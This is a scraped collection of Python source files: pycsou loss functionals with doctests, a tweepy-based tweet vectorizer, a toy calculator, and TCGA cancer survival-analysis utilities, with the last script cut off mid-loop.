:py:class:`~pycsou.core.functional.ProximableFunctional`
Proximable loss functional constructed as :math:`F(\mathbf{x}; \mathbf{y}):= \varphi(\mathbf{x}-\mathbf{y}), \,\forall \mathbf{x}\in\mathbb{R}^N.`
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import ProximableLoss
from pycsou.func.penalty import L1Norm
.. doctest::
>>> y = np.arange(10)
>>> func = L1Norm(dim=y.size)
>>> loss = ProximableLoss(func=func, data=y)
>>> x = 2 * np.arange(10)
>>> np.allclose(loss(x), func(x-y))
True
>>> np.allclose(loss.prox(x, tau=1), func.prox(x-y, tau=1) + y)
True
Notes
-----
The proximity operator of the loss functional is automatically computed from the one of the input functional :math:`\varphi` using
properties described in [ProxAlg]_ Section 2.1.
See Also
--------
:py:func:`~pycsou.func.loss.DifferentiableLoss`.
"""
return ProxFuncPreComp(func, scale=1, shift=-data)
def DifferentiableLoss(func: DifferentiableFunctional, data: Union[Number, np.ndarray]) -> DifferentiableFunctional:
r"""
Constructor of proximable loss functions.
Constructs a differentiable loss from a differentiable functional and a data vector.
Let :math:`\varphi:\mathbb{R}^N\rightarrow \mathbb{R}` be some differentiable functional and :math:`\mathbf{y}\in\mathbb{R}^N`.
This routine defines the loss functional :math:`F(\mathbf{x}; \mathbf{y}):= \varphi(\mathbf{x}-\mathbf{y}), \,\forall \mathbf{x}\in\mathbb{R}^N.`
Parameters
----------
func: DifferentiableFunctional
Some differentiable functional :math:`\varphi:\mathbb{R}^N\rightarrow \mathbb{R}`.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}\in\mathbb{R}^N`.
Returns
-------
:py:class:`~pycsou.core.functional.DifferentiableFunctional`
Differentiable loss functional constructed as :math:`F(\mathbf{x}; \mathbf{y}):= \varphi(\mathbf{x}-\mathbf{y}), \,\forall \mathbf{x}\in\mathbb{R}^N.`
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import DifferentiableLoss
from pycsou.func.penalty import SquaredL2Norm
.. doctest::
>>> y = np.arange(10)
>>> func = SquaredL2Norm(dim=y.size)
>>> loss = DifferentiableLoss(func=func, data=y)
>>> x = 2 * np.arange(10)
>>> np.allclose(loss(x), func(x-y))
True
>>> np.allclose(loss.gradient(x), 2*(x-y))
True
Notes
-----
The derivative and Lipschitz constant of the loss functional are automatically computed from those of the input functional :math:`\varphi`.
See Also
--------
:py:func:`~pycsou.func.loss.ProximableLoss`.
"""
return func.shifter(shift=-data)
def L2Loss(dim: int, data: Union[Number, np.ndarray]) -> ProximableFunctional:
r"""
:math:`\ell_2` loss functional, :math:`F(\mathbf{y},\mathbf{x}):=\|\mathbf{y}-\mathbf{x}\|_2`.
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}`.
Returns
-------
:py:class:`~pycsou.core.functional.ProximableFunctional`
The :math:`\ell_2` loss functional.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import L2Loss
from pycsou.func.penalty import L2Norm
.. doctest::
>>> y = np.arange(10)
>>> loss = L2Loss(dim=y.size, data=y)
>>> func = L2Norm(dim=y.size)
>>> x = 2 * np.arange(10)
>>> np.allclose(loss.prox(x, tau=1), func.prox(x-y, tau=1) + y)
True
See Also
--------
:py:func:`~pycsou.func.penalty.L2Norm`, :py:func:`~pycsou.func.loss.L1Loss`, :py:func:`~pycsou.func.loss.LInftyLoss`
"""
L2_norm = L2Norm(dim=dim)
return ProximableLoss(L2_norm, data=data)
def SquaredL2Loss(dim: int, data: Union[Number, np.ndarray]) -> DifferentiableFunctional:
r"""
:math:`\ell^2_2` loss functional, :math:`F(\mathbf{y},\mathbf{x}):=\|\mathbf{y}-\mathbf{x}\|^2_2`.
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}`.
Returns
-------
:py:class:`~pycsou.core.functional.DifferentiableFunctional`
The :math:`\ell^2_2` loss functional.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import SquaredL2Loss
from pycsou.func.penalty import SquaredL2Norm
from pycsou.linop.base import DenseLinearOperator
.. doctest::
>>> y = np.arange(10)
>>> loss = SquaredL2Loss(dim=y.size, data=y)
>>> Gmat = np.arange(100).reshape(10, 10).astype(float)
>>> G = DenseLinearOperator(Gmat, is_symmetric=False)
>>> G.compute_lipschitz_cst()
>>> fwd_loss = loss * G
>>> x = 2 * np.arange(10)
>>> np.allclose(loss(x), np.linalg.norm(y - x) ** 2)
True
>>> np.allclose(fwd_loss(x), loss(G(x)))
True
>>> np.allclose(fwd_loss.diff_lipschitz_cst, 2 * (G.lipschitz_cst ** 2))
True
>>> np.allclose(fwd_loss.gradient(x), 2 * G.adjoint(G(x) - y))
True
Notes
-----
The :math:`\ell_2^2` functional is the likelihood of the data :math:`\mathbf{y}` under the assumtpion of
Gaussian white noise.
See Also
--------
:py:func:`~pycsou.func.penalty.SquaredL2Norm`, :py:func:`~pycsou.func.loss.L2Loss`.
"""
squared_L2_norm = SquaredL2Norm(dim=dim)
return DifferentiableLoss(squared_L2_norm, data=data)
def L2BallLoss(dim: int, data: Union[Number, np.ndarray], radius: Number = 1) -> ProximableFunctional:
r"""
:math:`\ell_2`-ball loss functional, :math:`\{\mathbf{x}\in\mathbb{R}^N: \|\mathbf{y}-\mathbf{x}\|_2\leq \text{radius}\}`.
The :math:`\ell_2`-ball loss functional is defined as:
.. math::
\iota(\mathbf{x}):=\begin{cases}
0 \,\text{if} \,\|\mathbf{x}-\mathbf{y}\|_2\leq \text{radius},\\
\, 0\,\text{ortherwise}.
\end{cases}
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}`.
radius: Number
Radius of the ball.
Returns
-------
:py:class:`~pycsou.core.functional.ProximableFunctional`
The :math:`\ell_2`-ball loss functional.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import L2BallLoss
from pycsou.func.penalty import L2Ball
.. doctest::
>>> y = np.arange(10)
>>> loss = L2BallLoss(dim=y.size, data=y, radius=2)
>>> func = L2Ball(dim=y.size, radius=2)
>>> x = 2 * np.arange(10)
>>> np.allclose(loss.prox(x, tau=1), func.prox(x-y, tau=1) + y)
True
Notes
-----
The :math:`\ell_2`-ball loss functional is particularly useful in the context of Gaussian white noise with
known standard deviation. In which case, the :math:`\ell_2`-ball defines a confidence region for the data :math:`\mathbf{y}` ([FuncSphere]_ Section 5 of Chapter 7).
See Also
--------
:py:func:`~pycsou.func.penalty.L2Ball`, :py:func:`~pycsou.func.loss.L2Loss`.
"""
L2_ball = L2Ball(dim=dim, radius=radius)
return ProximableLoss(L2_ball, data=data)
def L1Loss(dim: int, data: Union[Number, np.ndarray]) -> ProximableFunctional:
r"""
:math:`\ell_1` loss functional, :math:`F(\mathbf{y},\mathbf{x}):=\|\mathbf{y}-\mathbf{x}\|_1`.
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}`.
Returns
-------
:py:class:`~pycsou.core.functional.ProximableFunctional`
The :math:`\ell_1` loss functional.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import L1Loss
from pycsou.func.penalty import L1Norm
.. doctest::
>>> y = np.arange(10)
>>> loss = L1Loss(dim=y.size, data=y)
>>> func = L1Norm(dim=y.size)
>>> x = 2 * np.arange(10)
>>> np.allclose(loss.prox(x, tau=1), func.prox(x-y, tau=1) + y)
True
Notes
-----
The :math:`\ell_1` loss functional leads to sparse residuals, with most of the predicted samples matching exactly the
observed samples, and a few –potentially large– misfits ([FuncSphere]_ Section 5 of Chapter 7).
Such a functional is particularly useful in the context of salt-and-pepper noise with strong outliers, or more generally
for noise distributions with heavy tails, templated by the Laplace distribution.
See Also
--------
:py:func:`~pycsou.func.penalty.L1Norm`, :py:func:`~pycsou.func.loss.SquaredL1Loss`.
"""
L1_norm = L1Norm(dim=dim)
return ProximableLoss(L1_norm, data=data)
def SquaredL1Loss(dim: int, data: Union[Number, np.ndarray], prox_computation='sort') -> ProximableFunctional:
r"""
:math:`\ell^2_1` loss functional, :math:`F(\mathbf{y},\mathbf{x}):=\|\mathbf{y}-\mathbf{x}\|^2_1`.
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}`.
Returns
-------
:py:class:`~pycsou.core.functional.ProximableFunctional`
The :math:`\ell^2_1` loss functional.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import SquaredL1Loss
from pycsou.func.penalty import SquaredL1Norm
.. doctest::
>>> y = np.arange(10)
>>> loss = SquaredL1Loss(dim=y.size, data=y)
>>> func = SquaredL1Norm(dim=y.size)
>>> x = 2 * np.arange(10)
>>> np.allclose(loss.prox(x, tau=1), func.prox(x-y, tau=1) + y)
True
See Also
--------
:py:func:`~pycsou.func.penalty.SquaredL1Norm`, :py:func:`~pycsou.func.loss.L1Loss`.
"""
squared_L1_norm = SquaredL1Norm(dim=dim, prox_computation=prox_computation)
return ProximableLoss(squared_L1_norm, data=data)
def L1BallLoss(dim: int, data: Union[Number, np.ndarray], radius: Number = 1) -> ProximableFunctional:
r"""
:math:`\ell_1`-ball loss functional, :math:`\{\mathbf{x}\in\mathbb{R}^N: \|\mathbf{y}-\mathbf{x}\|_1\leq \text{radius}\}`.
The :math:`\ell_1`-ball loss functional is defined as:
.. math::
\iota(\mathbf{x}):=\begin{cases}
0 \,\text{if} \,\|\mathbf{x}-\mathbf{y}\|_1\leq \text{radius},\\
\, 0\,\text{ortherwise}.
\end{cases}
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}`.
radius: Number
Radius of the ball.
Returns
-------
:py:class:`~pycsou.core.functional.ProximableFunctional`
The :math:`\ell_1`-ball loss functional.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import L1BallLoss
from pycsou.func.penalty import L1Ball
.. doctest::
>>> y = np.arange(10)
>>> loss = L1BallLoss(dim=y.size, data=y, radius=2)
>>> func = L1Ball(dim=y.size, radius=2)
>>> x = 2 * np.arange(10)
>>> np.allclose(loss.prox(x, tau=1), func.prox(x-y, tau=1) + y)
True
Notes
-----
The :math:`\ell_1`-ball loss functional is particularly useful in the context of salt-and-pepper noise with
known standard deviation. In which case, the :math:`\ell_1`-ball defines a confidence region for the data :math:`\mathbf{y}`.
See Also
--------
:py:func:`~pycsou.func.penalty.L1Ball`, :py:func:`~pycsou.func.loss.L1Loss`, :py:func:`~pycsou.func.loss.SquaredL1Loss`.
"""
L1_ball = L1Ball(dim=dim, radius=radius)
return ProximableLoss(L1_ball, data=data)
def LInftyLoss(dim: int, data: Union[Number, np.ndarray]) -> ProximableFunctional:
r"""
:math:`\ell_\infty` loss functional, :math:`F(\mathbf{y},\mathbf{x}):=\|\mathbf{y}-\mathbf{x}\|_\infty`.
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}`.
Returns
-------
:py:class:`~pycsou.core.functional.ProximableFunctional`
The :math:`\ell_\infty` loss functional.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import LInftyLoss
from pycsou.func.penalty import LInftyNorm
.. doctest::
>>> y = np.arange(10)
>>> loss = LInftyLoss(dim=y.size, data=y)
>>> func = LInftyNorm(dim=y.size)
>>> x = 2 * np.arange(10)
>>> loss(x)
9
>>> np.allclose(loss.prox(x, tau=1), func.prox(x-y, tau=1) + y)
True
Notes
-----
The :math:`\ell_\infty` loss functional is particularly useful in the context of quantisation noise, or more generally
for noise distributions with compact support.
See Also
--------
:py:func:`~pycsou.func.penalty.LInftyNorm`, :py:func:`~pycsou.func.loss.LInftyBallLoss`.
"""
LInfty_norm = LInftyNorm(dim=dim)
return ProximableLoss(LInfty_norm, data=data)
def LInftyBallLoss(dim: int, data: Union[Number, np.ndarray], radius: Number = 1) -> ProximableFunctional:
r"""
:math:`\ell_\infty`-ball loss functional, :math:`\{\mathbf{x}\in\mathbb{R}^N: \|\mathbf{y}-\mathbf{x}\|_\infty\leq \text{radius}\}`.
The :math:`\ell_1`-ball loss functional is defined as:
.. math::
\iota(\mathbf{x}):=\begin{cases}
0 \,\text{if} \,\|\mathbf{x}-\mathbf{y}\|_\infty\leq \text{radius},\\
\, 0\,\text{ortherwise}.
\end{cases}
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}`.
radius: Number
Radius of the ball.
Returns
-------
:py:class:`~pycsou.core.functional.ProximableFunctional`
The :math:`\ell_\infty`-ball loss functional.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import LInftyBallLoss
from pycsou.func.penalty import LInftyBall
.. doctest::
>>> y = np.arange(10)
>>> loss = LInftyBallLoss(dim=y.size, data=y, radius=2)
>>> func = LInftyBall(dim=y.size, radius=2)
>>> x = 2 * np.arange(10)
>>> np.allclose(loss.prox(x, tau=1), func.prox(x-y, tau=1) + y)
True
Notes
-----
The :math:`\ell_\infty`-ball loss functional is particularly useful in the context of quantisation noise with
compact support. In which case, the :math:`\ell_\infty`-ball defines a confidence region for the data :math:`\mathbf{y}`.
See Also
--------
:py:func:`~pycsou.func.penalty.LInftyBall`, :py:func:`~pycsou.func.loss.LInftyLoss`, :py:func:`~pycsou.func.penalty.LInftyNorm`.
"""
LInfty_ball = LInftyBall(dim=dim, radius=radius)
return ProximableLoss(LInfty_ball, data=data)
def ConsistencyLoss(dim: int, data: Union[Number, np.ndarray]):
r"""
Consistency loss functional :math:`\mathbf{y}=\mathbf{x}`.
The consistency loss functional is defined as:
.. math::
\iota(\mathbf{x}):=\begin{cases}
0 \,\text{if} \,\mathbf{x}=\mathbf{y},\\
\, 0\,\text{ortherwise}.
\end{cases}
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}` to match.
Returns
-------
:py:class:`~pycsou.core.functional.ProximableFunctional`
The consistency loss functional.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import ConsistencyLoss
.. doctest::
>>> y = np.arange(10)
>>> loss = ConsistencyLoss(dim=y.size, data=y)
>>> x = 2 * np.arange(10)
>>> loss(x), loss(y)
(inf, 0)
>>> np.allclose(loss.prox(x, tau=1), y)
True
Notes
-----
This functional enforces an exact match between the predicted and observed samples, as required in interpolation problems.
Such a functional is mainly useful in the context of noiseless data as it can lead to serious overfitting issues in the presence of noise.
"""
condition_func = lambda x: np.allclose(x, data)
projection_func = lambda x: data
return IndicatorFunctional(dim=dim, condition_func=condition_func, projection_func=projection_func)
class KLDivergence(ProximableFunctional):
r"""
Generalised Kullback-Leibler divergence :math:`D_{KL}(\mathbf{y}||\mathbf{x}):=\sum_{i=1}^N y_i\log(y_i/x_i) -y_i +x_i`.
The generalised Kullback-Leibler divergence is defined as:
.. math::
D_{KL}(\mathbf{y}||\mathbf{x}):=\sum_{i=1}^N H(y_i,x_i) -y_i +x_i, \quad \forall \mathbf{y}, \mathbf{x} \in \mathbb{R}^N,
where
.. math::
H(y,x):=\begin{cases}
y\log(y/x) &\, \text{if} \,x>0, y>0,\\
0&\, \text{if} \,x=0, y\geq 0,\\
+\infty &\,\text{otherwise.}
\end{cases}
Parameters
----------
dim: int
Dimension of the domain.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}` to match.
Returns
-------
:py:class:`~pycsou.core.functional.ProximableFunctional`
The KL-divergence.
Examples
--------
.. testsetup::
import numpy as np
from pycsou.func.loss import KLDivergence
.. doctest::
>>> y = np.arange(10)
>>> loss = KLDivergence(dim=y.size, data=y)
>>> x = 2 * np.arange(10)
>>> loss(x)
13.80837687480246
>>> np.round(loss.prox(x, tau=1))
array([ 0., 2., 4., 6., 8., 10., 12., 14., 16., 18.])
Notes
-----
In information theory, and in the case where :math:`\mathbf{y}` and :math:`\mathbf{x}` sum to one --and hence can be interpreted as discrete probability distributions,
the KL-divergence can be interpreted as the relative entropy of :math:`\mathbf{y}` w.r.t. :math:`\mathbf{x}`,
i.e. the amount of information lost when using :math:`\mathbf{x}` to approximate :math:`\mathbf{y}`.
It is particularly useful in the context of count data with Poisson distribution. Indeed, the KL-divergence corresponds
–up to an additive constant– to the likelihood of the data :math:`\mathbf{y}` where each component is independent
with Poisson distribution and respective intensities given by the entries of :math:`\mathbf{x}`.
See [FuncSphere]_ Section 5 of Chapter 7 for the computation of its proximal operator.
See Also
--------
:py:class:`~pycsou.func.penalty.ShannonEntropy`, :py:class:`~pycsou.func.penalty.LogBarrier`
"""
def __init__(self, dim: int, data: Union[Number, np.ndarray]):
super(KLDivergence, self).__init__(dim=dim, data=None, is_differentiable=False, is_linear=False)
self.data = data
def __call__(self, x: Union[Number, np.ndarray]) -> Number:
z = 0 * x + np.infty
z[(x > 0) * (self.data > 0)] = self.data[(x > 0) * (self.data > 0)] * np.log(
self.data[(x > 0) * (self.data > 0)] / x[(x > 0) * (self.data > 0)])
z[(x == 0) * (self.data >= 0)] = 0
return np.sum(z - self.data + x)
def prox(self, x: Union[Number, np.ndarray], tau: Number) -> Union[Number, np.ndarray]:
r"""
Proximal operator of the KL-divergence functional (see [FuncSphere]_ Section 5 of Chapter 7).
Parameters
----------
x: Union[Number, np.ndarray]
Input.
tau: Number
Scaling constant.
Returns
-------
Union[Number, np.ndarray]
Proximal point of x.
"""
return (x - tau + np.sqrt((x - tau) ** 2 + 4 * tau * self.data)) / 2
if __name__ == "__main__":
import doctest
doctest.testmod()
``` |
{
"source": "joanRVAllen/twitoff-22",
"score": 3
} |
#### File: twitoff-22/twitoff/twitter.py
```python
from os import getenv
import tweepy # interacts with Twitter
import spacy # vectorizes tweets
from .models import DB, Tweet, User
# connect to Twitter API
TWITTER_API_KEY = getenv('TWITTER_API_KEY')
TWITTER_API_KEY_SECRET = getenv('TWITTER_API_KEY_SECRET')
TWITTER_AUTH = tweepy.OAuthHandler(TWITTER_API_KEY, TWITTER_API_KEY_SECRET)
TWITTER = tweepy.API(TWITTER_AUTH)
# not sure what this does
nlp = spacy.load('my_model')
def vectorize_tweet(tweet_text):
return nlp(tweet_text).vector
def add_or_update_user(username):
try:
twitter_user = TWITTER.get_user(username)
# If they exist then update that user, if we get something back
# then instantiate a new user
db_user = (User.query.get(twitter_user.id)) or User(
id=twitter_user.id, name=username)
DB.session.add(db_user)
tweets = twitter_user.timeline(
count=200,
exclude_replies=True,
include_rts=False,
tweet_mode="Extended"
) # list of tweets from 'username'
if tweets:
db_user.newest_tweet_id = tweets[0].id
for tweet in tweets:
vectorized_tweet = vectorize_tweet(tweet.text)
db_tweet = Tweet(id=tweet.id, text=tweet.text,
vect=vectorized_tweet)
db_user.tweets.append(db_tweet)
DB.session.add(db_tweet)
except Exception as e:
print('Error processing {}: {}'.format(username, e))
else:
DB.session.commit()
``` |
{
"source": "JoanS4/calculadora",
"score": 4
} |
#### File: calculadora/calculadora/file2.py
```python
def operacionvalores (valor1,valor2,operacion) :
if operacion == "sumar":
resultat = valor1+valor2
elif operacion == "restar":
resultat = valor1-valor2
elif operacion == "multiplicar":
resultat = valor1 * valor2
return resultat
#Execució
if __name__ == "__main__":
resultat = operacionvalores (1,2, "multiplicar")
print(resultat)
``` |
{
"source": "joan-smith/biomarker-survival",
"score": 3
} |
#### File: biomarker-survival/biomarker_survival/tcga_cdr_utilities.py
```python
import pandas as pd
import numpy as np
import sys
import os
class TCGA_CDR_util:
# Cancer types with OS recommended are excluded for brevity.
# OS is the default.
RECOMMENDED_ENDPOINTS = {
'BRCA': 'PFI', # alternative: DFI
'DLBC': 'PFI', # none rec w/o reservation
'KICH': 'OS', # none rec w/o reservation
'LGG': 'PFI', # alternative: DFI
'PCPG': 'PFI', # not recommended, but largest number of events
'PRAD': 'PFI', # alternative: DFI
'READ': 'PFI', # only recommended
'TGCT': 'PFI', # alternative: DFI
'THCA': 'PFI', # alternative: DFI
'THYM': 'PFI', # alternative: DFI
}
def __init__(self, tcga_cgr_table):
self.tcga_cgr_table_path = tcga_cgr_table
self.df = self.read_table()
def read_table(self):
'''
Pull the table into a dataframe and remove redacted patients.
'''
df = pd.read_excel(self.tcga_cgr_table_path,
sheet_name=0,
header=0,
index_col=1,
na_values=['[Not Applicable]', '[Not Available]'],
engine='openpyxl')
df = df[df['Redaction'].isnull()]
return df
def recommended_endpoint(self, cancer_type):
endpoint = 'OS'
if cancer_type in self.RECOMMENDED_ENDPOINTS:
endpoint = self.RECOMMENDED_ENDPOINTS[cancer_type]
return endpoint
def cancer_types(self):
return self.df['type'].unique()
def cancer_type_data(self, cancer_type, extra_cols=[]):
"""
Given a path to the TCGA-CDR Supplemental Table 1, and a cancer type, produce a pandas dataframe
with the recommended time/censor columns and any extra clinical data explicitly requested.
For all cancer types, cancer_type='*'
"""
result_cols = ['censor', 'time'] + extra_cols
if cancer_type == '*':
all_cancers = pd.DataFrame(columns=['type', 'censor', 'time'] + extra_cols)
for t in self.df['type'].unique():
endpoint = self.recommended_endpoint(t)
cols = ['type', endpoint, endpoint + '.time'] + extra_cols
ctype_df = self.df[self.df['type'] == t][cols]
ctype_df.columns = ['type'] + result_cols
all_cancers = all_cancers.append(ctype_df)
return all_cancers.dropna(how='any', subset=['time', 'censor'])
ctype_df = self.df[self.df['type'] == cancer_type]
endpoint = self.recommended_endpoint(cancer_type)
ctype_df = ctype_df[[endpoint, endpoint + '.time'] + extra_cols]
ctype_df.columns = result_cols
ctype_df = ctype_df.dropna(how='any', subset=['time', 'censor'])
return ctype_df
```
#### File: biomarker-survival/tests/test_analysis.py
```python
import os
import numpy as np
import rpy2
from biomarker_survival import analysis
def test_do_cox_success():
time = [48, 79, 9, 60, 81, 0, 64, 5, 26, 39, 83, 55, 33, 20, 29, 38, 47, 49, 96, 50, 84, 45, 84, 43,
4, 87, 27, 15, 24, 34, 46, 43, 53, 41, 86, 69, 79, 25, 6, 65, 71, 52, 43, 18, 32, 7, 47, 57,
7, 45]
censor = [1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1,
1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 0, 1]
split = [0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0,
1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1]
cox_dict = analysis.do_cox(time, censor, split)
print(cox_dict)
assert cox_dict['n'] == 50
assert cox_dict['p'] < 1
assert list(cox_dict.keys()).sort() == ['n', 'z', 'p', 'hazard_ratio', 'lower_conf', 'upper_conf'].sort()
def test_do_cox_fail():
time = np.random.randint(0,1, 5)
censor = np.random.randint(0,1, 5)
split = np.random.randint(0,1, 5)
cox_dict = analysis.do_cox(time, censor, split)
if len(list(cox_dict.keys())) == 0:
assert list(cox_dict.keys()) == []
else:
assert np.isnan(cox_dict['p'])
assert list(cox_dict.keys()).sort() == ['n', 'z', 'p', 'hazard_ratio', 'lower_conf', 'upper_conf'].sort()
``` |
{
"source": "joan-smith/comprehensive-tcga-survival",
"score": 2
} |
#### File: comprehensive-tcga-survival/comprehensive_tcga_survival/main.py
```python
import pandas as pd
import os
import pathlib
import scipy
import glob
import biomarker_survival as surv
from comprehensive_tcga_survival import rppa
from comprehensive_tcga_survival import cn
from comprehensive_tcga_survival import mirna
from comprehensive_tcga_survival import rnaseq
from comprehensive_tcga_survival import methylation
from comprehensive_tcga_survival import mutations
from comprehensive_tcga_survival import Multivariate
from statsmodels.stats.multitest import fdrcorrection
#%%
dropbox_dir = '~/Dropbox/'
stage_key = dropbox_dir + 'comprehensive-tcga-survival/Multivariate/Stage_key.xlsx'
grade_key = dropbox_dir + 'comprehensive-tcga-survival/Multivariate/Grade_key.xlsx'
clinical = dropbox_dir + 'comprehensive-tcga-survival/raw-data/TCGA-CDR-SupplementalTableS1-2019-05-27.xlsx'
raw_data = dropbox_dir + 'comprehensive-tcga-survival/raw-data/'
#%%
platforms = {'rppa': dropbox_dir + 'comprehensive-tcga-survival/raw-data/TCGA-RPPA-pancan-clean.txt',
'cn': dropbox_dir + 'comprehensive-tcga-survival/cn/cn_by_gene.csv',
'mirna': dropbox_dir + 'comprehensive-tcga-survival/raw-data/pancanMiRs_EBadjOnProtocolPlatformWithoutRepsWithUnCorrectMiRs_08_04_16.csv',
'rnaseq': dropbox_dir + 'comprehensive-tcga-survival/raw-data/EBPlusPlusAdjustPANCAN_IlluminaHiSeq_RNASeqV2.geneExp.tsv',
'methylation': (dropbox_dir + 'comprehensive-tcga-survival/raw-data/jhu-usc.edu_PANCAN_merged_HumanMethylation27_HumanMethylation450.betaValue_whitelisted.tsv',
dropbox_dir + 'comprehensive-tcga-survival/raw-data/HumanMethylation450_15017482_v1-2.csv'),
'mutations-non-synonymous': dropbox_dir + 'comprehensive-tcga-survival/raw-data/mc3.v0.2.8.PUBLIC.maf'}
#%%
tcga_cdr_local = surv.TCGA_CDR_util(clinical)
cancer_types = tcga_cdr_local.cancer_types()
#%% Prep univariate zscores
platform_outdir = dropbox_dir + 'comprehensive-tcga-survival/'
parallel = 35
for p, rd in platforms.items():
pathlib.Path(platform_outdir).mkdir(parents=True, exist_ok=True)
if p == 'rppa':
rppa.zscores(rd, clinical, platform_outdir, parallel)
if p == 'cn':
cn.zscores(rd, clinical, platform_outdir, parallel)
if p == 'rnaseq':
rnaseq.zscores(rd, clinical, platform_outdir, parallel)
if p == 'mirna':
mirna.zscores(rd, clinical, platform_outdir, parallel)
if p == 'methylation':
methylation_data = rd[0]
methylation_key = rd[1]
methylation.zscores(methylation_data, methylation_key, clinical, platform_outdir, parallel)
if p == 'mutations':
mutations.zscores(rd, clinical, platform_outdir, parallel)
#%% Prep Metadata
outdir = dropbox_dir + 'comprehensive-tcga-survival/'
metadata = {}
for p, rd in platforms.items():
if p == 'rppa':
metadata['rppa'] = rppa.metadata(rd, clinical)
if p == 'cn':
metadata['cn'] = cn.metadata(rd, clinical)
if p == 'mirna':
metadata['mirna'] = mirna.metadata(rd, clinical)
if p == 'rnaseq':
metadata['rnaseq'] = rnaseq.metadata(rd, clinical)
if p == 'methylation-large':
methylation_large_data = rd[0]
methylation_key = rd[1]
metadata['methylation-large'] = methylation.metadata(methylation_large_data, methylation_key, clinical)
if p == 'methylation':
methylation_data = rd[0]
methylation_key = rd[1]
metadata['methylation'] = methylation.metadata(methylation_data, methylation_key, clinical)
if p == 'mutations':
metadata['mutations'] = mutations.metadata(rd, clinical)
pd.DataFrame(metadata).to_csv(os.path.join(outdir, 'patient_counts_cloud.csv'))
#%% Prep Multivariate
parallel = 35
outdir = dropbox_dir + 'comprehensive-tcga-survival/age-stage-grade-sex'
multivar = Multivariate(tcga_cdr_local, stage_key, grade_key)
ctype_multivars = multivar.prep_all_multivar()
for p, rd in platforms.items():
platform_outdir = os.path.join(outdir, p)
if p == 'rppa':
rppa.zscores(rd, clinical, platform_outdir, parallel, additional_vars=ctype_multivars)
if p == 'cn':
cn.zscores(rd, clinical, platform_outdir, 14, additional_vars=ctype_multivars)
if p == 'rnaseq':
rnaseq.zscores(rd, clinical, platform_outdir, parallel, additional_vars=ctype_multivars)
if p == 'mirna':
mirna.zscores(rd, clinical, platform_outdir, parallel, additional_vars=ctype_multivars)
if p == 'methylation':
methylation_data = rd[0]
methylation_key = rd[1]
methylation.zscores(methylation_data, methylation_key, clinical, platform_outdir, parallel, additional_vars=ctype_multivars)
if p == 'mutations':
mutations.zscores(rd, clinical, platform_outdir, parallel, additional_vars=ctype_multivars)
#%% RNASEQ: Sex, RPSY41, and XIST
rnaseq_data = rnaseq.prep_data(platforms['rnaseq'])
dfs = []
for c in cancer_types:
df = rnaseq.ctype_cleaning(rnaseq_data, c, None)
df = df.join(tcga_cdr_local.cancer_type_data(c, extra_cols=['gender']), how='inner')
out_df = df[['XIST', 'RPS4Y1', 'gender']].copy()
print(c)
print(out_df)
out_df['cancer_type'] = c
dfs.append(out_df)
dfs = pd.concat(dfs, axis=0)
dfs.to_csv(os.path.join(outdir, 'XIST_RPS4Y1.csv'), index_label='patient', columns=['cancer_type', 'gender', 'XIST', 'RPS4Y1'])
#%% Methylation: Sex + methylation sites
methylation_data = methylation.prep_data(platforms['methylation'][0], platforms['methylation'][1])
genes = ['MOSPD1', 'SLC9A7', 'MTMR1', 'APEX2', 'OTUD5','PHF8', 'OCRL', 'FAM50A',
'IRAK1','FTSJ1', 'PRDX4', 'EMD', 'TMEM185A', 'NDUFB11', 'RBM10','TSPYL2',
'ELK1', 'HTATSF1', 'BCOR','CLCN5']
dfs = []
for c in cancer_types:
df = methylation.ctype_cleaning(methylation_data, c, None)
df = df.join(tcga_cdr_local.cancer_type_data(c, extra_cols=['gender']), how='inner')
out_df = df[genes + ['gender']].copy()
out_df['cancer_type'] = c
dfs.append(out_df)
dfs = pd.concat(dfs, axis=0)
dfs.to_csv(os.path.join(outdir, 'methylation_sex.csv'), index_label='patient')
#%% FDR correction -- group all platforms together for cancer type
indir = dropbox_dir + '/comprehensive-tcga-survival'
def count_sig(g):
print(g.name)
print('uncorrected sig:', (g['value'] <= 0.05).sum())
significant_corrected = g['corrected-p'] <= 0.05
print(significant_corrected.sum(), sum(significant_corrected))
return sum(g['corrected-p'] <= 0.05)
significant_corrected_pvals = {}
for c in cancer_types:
print(c)
pvals = {}
for p in platforms.keys():
platform_dir = os.path.join(indir, p)
ctype_file = c + '.zscores.out.csv'
if p == 'mutations':
